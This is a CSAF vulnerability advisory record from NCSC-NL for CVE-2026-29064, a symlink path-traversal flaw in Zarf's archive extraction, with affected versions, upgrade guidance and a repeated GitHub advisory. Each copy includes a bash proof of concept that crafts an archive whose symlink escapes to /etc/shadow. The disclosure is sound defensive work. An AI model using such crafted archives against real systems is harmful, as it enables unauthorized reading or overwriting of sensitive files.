{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-29064",
        "tracking": {
            "current_release_date": "2026-03-26T01:48:00.962217Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-29064",
            "initial_release_date": "2026-03-06T16:38:38.592163Z",
            "revision_history": [
                {
                    "date": "2026-03-06T16:38:38.592163Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-06T16:38:40.330481Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-06T17:26:39.552233Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-06T17:26:43.747059Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T19:39:02.721451Z",
                    "number": "5",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-06T22:39:34.157250Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-06T22:39:40.471211Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-07T00:13:02.354564Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-07T14:47:10.094425Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-07T14:47:12.252148Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-11T01:25:00.470218Z",
                    "number": "11",
                    "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-11T01:25:09.850794Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-12T00:43:25.215385Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-19T15:29:21.313640Z",
                    "number": "14",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-19T15:29:23.594224Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:35:46.361718Z",
                    "number": "16",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-25T18:14:23.567938Z",
                    "number": "17",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (3)."
                },
                {
                    "date": "2026-03-25T18:14:26.466962Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T21:42:48.954362Z",
                    "number": "19",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (42).| References created (4).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "19"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0.54.0|<0.73.1",
                                "product": {
                                    "name": "vers:unknown/>=0.54.0|<0.73.1",
                                    "product_id": "CSAFPID-5783973",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:lfprojects:zarf:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "zarf"
                    }
                ],
                "category": "vendor",
                "name": "lfprojects"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0.54.0|<0.73.1",
                                "product": {
                                    "name": "vers:unknown/>=0.54.0|<0.73.1",
                                    "product_id": "CSAFPID-5766944"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/nightly",
                                "product": {
                                    "name": "vers:unknown/nightly",
                                    "product_id": "CSAFPID-5910237"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.54.0",
                                "product": {
                                    "name": "vers:unknown/v0.54.0",
                                    "product_id": "CSAFPID-5910238"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.55.0",
                                "product": {
                                    "name": "vers:unknown/v0.55.0",
                                    "product_id": "CSAFPID-5910239"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.55.1",
                                "product": {
                                    "name": "vers:unknown/v0.55.1",
                                    "product_id": "CSAFPID-5910240"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.55.2",
                                "product": {
                                    "name": "vers:unknown/v0.55.2",
                                    "product_id": "CSAFPID-5910241"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.55.3",
                                "product": {
                                    "name": "vers:unknown/v0.55.3",
                                    "product_id": "CSAFPID-5910242"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.55.4",
                                "product": {
                                    "name": "vers:unknown/v0.55.4",
                                    "product_id": "CSAFPID-5910243"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.55.5",
                                "product": {
                                    "name": "vers:unknown/v0.55.5",
                                    "product_id": "CSAFPID-5910244"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.55.6",
                                "product": {
                                    "name": "vers:unknown/v0.55.6",
                                    "product_id": "CSAFPID-5910245"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.56.0",
                                "product": {
                                    "name": "vers:unknown/v0.56.0",
                                    "product_id": "CSAFPID-5910246"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.57.0",
                                "product": {
                                    "name": "vers:unknown/v0.57.0",
                                    "product_id": "CSAFPID-5910247"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.58.0",
                                "product": {
                                    "name": "vers:unknown/v0.58.0",
                                    "product_id": "CSAFPID-5910248"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.58.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.58.0-rc1",
                                    "product_id": "CSAFPID-5910249"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.59.0",
                                "product": {
                                    "name": "vers:unknown/v0.59.0",
                                    "product_id": "CSAFPID-5910250"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.60.0",
                                "product": {
                                    "name": "vers:unknown/v0.60.0",
                                    "product_id": "CSAFPID-5910251"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.60.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.60.0-rc1",
                                    "product_id": "CSAFPID-5910252"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.61.0",
                                "product": {
                                    "name": "vers:unknown/v0.61.0",
                                    "product_id": "CSAFPID-5910253"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.61.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.61.0-rc1",
                                    "product_id": "CSAFPID-5910254"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.61.1",
                                "product": {
                                    "name": "vers:unknown/v0.61.1",
                                    "product_id": "CSAFPID-5910255"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.61.2",
                                "product": {
                                    "name": "vers:unknown/v0.61.2",
                                    "product_id": "CSAFPID-5910256"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.62.0",
                                "product": {
                                    "name": "vers:unknown/v0.62.0",
                                    "product_id": "CSAFPID-5910257"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.63.0",
                                "product": {
                                    "name": "vers:unknown/v0.63.0",
                                    "product_id": "CSAFPID-5910258"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.63.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.63.0-rc1",
                                    "product_id": "CSAFPID-5910259"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.64.0",
                                "product": {
                                    "name": "vers:unknown/v0.64.0",
                                    "product_id": "CSAFPID-5910260"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.65.0",
                                "product": {
                                    "name": "vers:unknown/v0.65.0",
                                    "product_id": "CSAFPID-5910261"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.65.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.65.0-rc1",
                                    "product_id": "CSAFPID-5910262"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.65.1",
                                "product": {
                                    "name": "vers:unknown/v0.65.1",
                                    "product_id": "CSAFPID-5910263"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.66.0",
                                "product": {
                                    "name": "vers:unknown/v0.66.0",
                                    "product_id": "CSAFPID-5910264"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.67.0",
                                "product": {
                                    "name": "vers:unknown/v0.67.0",
                                    "product_id": "CSAFPID-5910265"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.67.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.67.0-rc1",
                                    "product_id": "CSAFPID-5910266"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.68.0",
                                "product": {
                                    "name": "vers:unknown/v0.68.0",
                                    "product_id": "CSAFPID-5910267"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.68.1",
                                "product": {
                                    "name": "vers:unknown/v0.68.1",
                                    "product_id": "CSAFPID-5910268"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.69.0",
                                "product": {
                                    "name": "vers:unknown/v0.69.0",
                                    "product_id": "CSAFPID-5910269"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.69.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.69.0-rc1",
                                    "product_id": "CSAFPID-5910270"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.70.0",
                                "product": {
                                    "name": "vers:unknown/v0.70.0",
                                    "product_id": "CSAFPID-5910271"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.70.1",
                                "product": {
                                    "name": "vers:unknown/v0.70.1",
                                    "product_id": "CSAFPID-5910272"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.71.0",
                                "product": {
                                    "name": "vers:unknown/v0.71.0",
                                    "product_id": "CSAFPID-5910273"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.71.1",
                                "product": {
                                    "name": "vers:unknown/v0.71.1",
                                    "product_id": "CSAFPID-5910274"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.72.0",
                                "product": {
                                    "name": "vers:unknown/v0.72.0",
                                    "product_id": "CSAFPID-5910275"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.72.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.72.0-rc1",
                                    "product_id": "CSAFPID-5910276"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.73.0",
                                "product": {
                                    "name": "vers:unknown/v0.73.0",
                                    "product_id": "CSAFPID-5910277"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.73.1-rc1",
                                "product": {
                                    "name": "vers:unknown/v0.73.1-rc1",
                                    "product_id": "CSAFPID-5910278"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "zarf"
                    }
                ],
                "category": "vendor",
                "name": "zarf-dev"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-29064",
            "cwe": {
                "id": "CWE-22",
                "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "Zarf is an Airgap Native Packager Manager for Kubernetes. From version 0.54.0 to before version 0.73.1, a path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package. This issue has been patched in version 0.73.1.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-29064"
                },
                {
                    "category": "description",
                    "text": "Zarf is an Airgap Native Packager Manager for Kubernetes. From version 0.54.0 to before version 0.73.1, a path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package. This issue has been patched in version 0.73.1.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-29064"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nA path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.\n\n### What users should do\nUpgrade immediately to version v0.73.1\n\nIf developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.\n\nIf using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.\n\n### Who is affected\n\n- Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the `zarf tools archiver decompress` functionality on generic archives.\n\n- Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations. \n\n### What is the risk\n\nA malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.\n\n### Mitigating Factors\n\nIf developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress`), the risk is low. \n\n### Details\n\nThe archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:\n\n1. defaultHandler (on line 320): Joins `dst` with `f.LinkTarget`, but does not verify the resolved path stays under `dst`. This means that a LinkTarget of `\"../../../../etc/shadow\"` would resolve outside the destination after `filepath.Join`.\n2. stripHandler (on line 342): Passes `f.LinkTarget` verbatim to `os.Symlink`.\n3. filterHandler (on line 370): Similar to `defaultHandler`, the code joins but does not validate the `LinkTarget`.\n\nThe vulnerability is a symlink variant of the \"Zip Slip\" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious `f.LinkTarget`. When the package is extracted, `os.Symlink` creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.\n\n### PoC\n\n<details>\n<summary>Proof of Concept</summary>\nYou may want to follow through these steps inside of a disposable environment (container, VM):\n\n```bash\nReproduction via zarf tools archiver decompress (simplest)\n\nThis demonstrates the vulnerability using the defaultHandler (line 320).\n\n# 1. Create a staging directory for the malicious archive contents.\nmkdir -p /tmp/cve-repro/archive-contents\n\n# 2. Create a symlink that traverses out of the extraction directory.\n#    This symlink targets \"../../../../../../../etc/shadow\" relative to\n#    whatever extraction destination is chosen.\ncd /tmp/cve-repro/archive-contents\nln -s ../../../../../../../etc/shadow escape-link\n\n# 3. Also create a regular file so the archive isn't empty besides the link.\necho \"benign content\" > readme.txt\n\n# 4. Package into a tar.gz archive.\n#    The --dereference flag is NOT used, so the symlink is stored as-is.\ncd /tmp/cve-repro\ntar -czf malicious.tar.gz -C archive-contents .\n\n# 5. Verify the archive contains the symlink.\ntar -tvf malicious.tar.gz\n# Expected output includes:\n#   lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow\n\n# 6. Create the extraction destination (deeply nested so the traversal\n#    resolves to a real path).\nmkdir -p /tmp/cve-repro/extract/a/b/c/d\n\n# 7. Run the vulnerable extraction.\nzarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d\n\n# 8. Verify the symlink was created pointing outside the destination.\nls -la /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: escape-link /etc/shadow\n#\n# The symlink target resolves to /etc/shadow, which is OUTSIDE\n# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.\n\nreadlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: /etc/shadow\n\nWhat happened: defaultHandler (line 320) executed:\nos.Symlink(filepath.Join(dst, f.LinkTarget), target)\n// = os.Symlink(\"/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow\",\n//              \"/tmp/cve-repro/extract/a/b/c/d/escape-link\")\nfilepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.\n```\n</details>",
                    "title": "github - https://github.com/advisories/GHSA-hcm4-6hpj-vghm"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nA path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.\n\n### What users should do\nUpgrade immediately to version v0.73.1\n\nIf developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.\n\nIf only trusted packages and archives are used, the only impact is updating the zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.\n\n### Who is affected\n\n- Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the `zarf tools archiver decompress` functionality on generic archives.\n\n- Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations. \n\n### What is the risk\n\nA malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.\n\n### Mitigating Factors\n\nIf developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress`), the risk is low. \n\n### Details\n\nThe archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:\n\n1. defaultHandler (on line 320): Joins `dst` with `f.LinkTarget`, but does not verify the resolved path stays under `dst`. This means that a LinkTarget of `\"../../../../etc/shadow\"` would resolve outside the destination after `filepath.Join`.\n2. stripHandler (on line 342): Passes `f.LinkTarget` verbatim to `os.Symlink`.\n3. filterHandler (on line 370): Similar to `defaultHandler`, the code joins but does not validate the `LinkTarget`.\n\nThe vulnerability is a symlink variant of the \"Zip Slip\" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious `f.LinkTarget`. When the package is extracted, `os.Symlink` creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.\n\n### PoC\n\n<details>\n<summary>Proof of Concept</summary>\nYou may want to follow through these steps inside of a disposable environment (container, VM):\n\n```bash\nReproduction via zarf tools archiver decompress (simplest)\n\nThis demonstrates the vulnerability using the defaultHandler (line 320).\n\n# 1. Create a staging directory for the malicious archive contents.\nmkdir -p /tmp/cve-repro/archive-contents\n\n# 2. Create a symlink that traverses out of the extraction directory.\n#    This symlink targets \"../../../../../../../etc/shadow\" relative to\n#    whatever extraction destination is chosen.\ncd /tmp/cve-repro/archive-contents\nln -s ../../../../../../../etc/shadow escape-link\n\n# 3. Also create a regular file so the archive isn't empty besides the link.\necho \"benign content\" > readme.txt\n\n# 4. Package into a tar.gz archive.\n#    The --dereference flag is NOT used, so the symlink is stored as-is.\ncd /tmp/cve-repro\ntar -czf malicious.tar.gz -C archive-contents .\n\n# 5. Verify the archive contains the symlink.\ntar -tvf malicious.tar.gz\n# Expected output includes:\n#   lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow\n\n# 6. Create the extraction destination (deeply nested so the traversal\n#    resolves to a real path).\nmkdir -p /tmp/cve-repro/extract/a/b/c/d\n\n# 7. Run the vulnerable extraction.\nzarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d\n\n# 8. Verify the symlink was created pointing outside the destination.\nls -la /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: escape-link /etc/shadow\n#\n# The symlink target resolves to /etc/shadow, which is OUTSIDE\n# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.\n\nreadlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: /etc/shadow\n\nWhat happened: defaultHandler (line 320) executed:\nos.Symlink(filepath.Join(dst, f.LinkTarget), target)\n// = os.Symlink(\"/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow\",\n//              \"/tmp/cve-repro/extract/a/b/c/d/escape-link\")\nfilepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.\n```\n</details>",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-hcm4-6hpj-vghm.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nA path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.\n\n### What users should do\nUpgrade immediately to version v0.73.1\n\nIf developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.\n\nIf only trusted packages and archives are used, the only impact is updating the zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.\n\n### Who is affected\n\n- Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the `zarf tools archiver decompress` functionality on generic archives.\n\n- Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations. \n\n### What is the risk\n\nA malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.\n\n### Mitigating Factors\n\nIf developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress`), the risk is low. \n\n### Details\n\nThe archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:\n\n1. defaultHandler (on line 320): Joins `dst` with `f.LinkTarget`, but does not verify the resolved path stays under `dst`. This means that a LinkTarget of `\"../../../../etc/shadow\"` would resolve outside the destination after `filepath.Join`.\n2. stripHandler (on line 342): Passes `f.LinkTarget` verbatim to `os.Symlink`.\n3. filterHandler (on line 370): Similar to `defaultHandler`, the code joins but does not validate the `LinkTarget`.\n\nThe vulnerability is a symlink variant of the \"Zip Slip\" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious `f.LinkTarget`. When the package is extracted, `os.Symlink` creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.\n\n### PoC\n\n<details>\n<summary>Proof of Concept</summary>\nYou may want to follow through these steps inside of a disposable environment (container, VM):\n\n```bash\nReproduction via zarf tools archiver decompress (simplest)\n\nThis demonstrates the vulnerability using the defaultHandler (line 320).\n\n# 1. Create a staging directory for the malicious archive contents.\nmkdir -p /tmp/cve-repro/archive-contents\n\n# 2. Create a symlink that traverses out of the extraction directory.\n#    This symlink targets \"../../../../../../../etc/shadow\" relative to\n#    whatever extraction destination is chosen.\ncd /tmp/cve-repro/archive-contents\nln -s ../../../../../../../etc/shadow escape-link\n\n# 3. Also create a regular file so the archive isn't empty besides the link.\necho \"benign content\" > readme.txt\n\n# 4. Package into a tar.gz archive.\n#    The --dereference flag is NOT used, so the symlink is stored as-is.\ncd /tmp/cve-repro\ntar -czf malicious.tar.gz -C archive-contents .\n\n# 5. Verify the archive contains the symlink.\ntar -tvf malicious.tar.gz\n# Expected output includes:\n#   lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow\n\n# 6. Create the extraction destination (deeply nested so the traversal\n#    resolves to a real path).\nmkdir -p /tmp/cve-repro/extract/a/b/c/d\n\n# 7. Run the vulnerable extraction.\nzarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d\n\n# 8. Verify the symlink was created pointing outside the destination.\nls -la /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: escape-link /etc/shadow\n#\n# The symlink target resolves to /etc/shadow, which is OUTSIDE\n# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.\n\nreadlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: /etc/shadow\n\nWhat happened: defaultHandler (line 320) executed:\nos.Symlink(filepath.Join(dst, f.LinkTarget), target)\n// = os.Symlink(\"/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow\",\n//              \"/tmp/cve-repro/extract/a/b/c/d/escape-link\")\nfilepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.\n```\n</details>",
                    "title": "github - https://api.github.com/advisories/GHSA-hcm4-6hpj-vghm"
                },
                {
                    "category": "description",
                    "text": "Zarf's symlink targets in archives are not validated against destination directory in github.com/zarf-dev/zarf",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4636.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Zarf is an Airgap Native Packager Manager for Kubernetes. From version 0.54.0 to before version 0.73.1, a path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package. This issue has been patched in version 0.73.1.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-29064.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00013",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.9",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Exploit code publicly available, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5766944",
                    "CSAFPID-5783973",
                    "CSAFPID-5910237",
                    "CSAFPID-5910238",
                    "CSAFPID-5910239",
                    "CSAFPID-5910240",
                    "CSAFPID-5910241",
                    "CSAFPID-5910242",
                    "CSAFPID-5910243",
                    "CSAFPID-5910244",
                    "CSAFPID-5910245",
                    "CSAFPID-5910246",
                    "CSAFPID-5910247",
                    "CSAFPID-5910248",
                    "CSAFPID-5910249",
                    "CSAFPID-5910250",
                    "CSAFPID-5910251",
                    "CSAFPID-5910252",
                    "CSAFPID-5910253",
                    "CSAFPID-5910254",
                    "CSAFPID-5910255",
                    "CSAFPID-5910256",
                    "CSAFPID-5910257",
                    "CSAFPID-5910258",
                    "CSAFPID-5910259",
                    "CSAFPID-5910260",
                    "CSAFPID-5910261",
                    "CSAFPID-5910262",
                    "CSAFPID-5910263",
                    "CSAFPID-5910264",
                    "CSAFPID-5910265",
                    "CSAFPID-5910266",
                    "CSAFPID-5910267",
                    "CSAFPID-5910268",
                    "CSAFPID-5910269",
                    "CSAFPID-5910270",
                    "CSAFPID-5910271",
                    "CSAFPID-5910272",
                    "CSAFPID-5910273",
                    "CSAFPID-5910274",
                    "CSAFPID-5910275",
                    "CSAFPID-5910276",
                    "CSAFPID-5910277",
                    "CSAFPID-5910278"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-29064"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/29xxx/CVE-2026-29064.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29064"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-29064"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
